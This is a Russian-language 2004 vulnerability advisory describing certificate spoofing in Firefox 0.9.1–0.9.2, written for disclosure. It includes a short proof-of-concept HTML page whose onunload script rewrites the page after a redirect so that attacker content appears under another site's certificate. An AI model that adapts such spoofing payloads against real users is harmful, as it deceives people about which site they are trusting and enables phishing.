Уязвимость подделки сертификатов в Mozilla Firefox
| Дата публикации: | 27.07.2004 |
| Всего просмотров: | 1888 |
| Опасность: | Низкая |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Уязвимые версии: Firefox 0.9.1, 0.9.2
Описание: Уязвимость подделки сертификатов обнаружена в Mozilla Firefox. Удаленный Web сервер может подделать сертификат другого сайта. Удаленный пользователь может создать специально обработанный HTML, который отобразит Web страницу с сертификатом другого произвольного безопасного Web сайта. Пример:
< HTML>
< HEAD>
< TITLE>Spoofer< /TITLE>
< META HTTP-EQUIV="REFRESH" CONTENT="0;URL=https://www.example.com">
< /HEAD>
< BODY
onunload="
document.close();
document.writeln('< body onload=document.close();break;>
< h3>It is Great to Use example's Cert!');
document.close();
window.location.reload();
">
< /body>
URL производителя: http://www.mozilla.org/products/firefox/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
| Ссылки: | Mozilla Firefox Certificate Spoofing |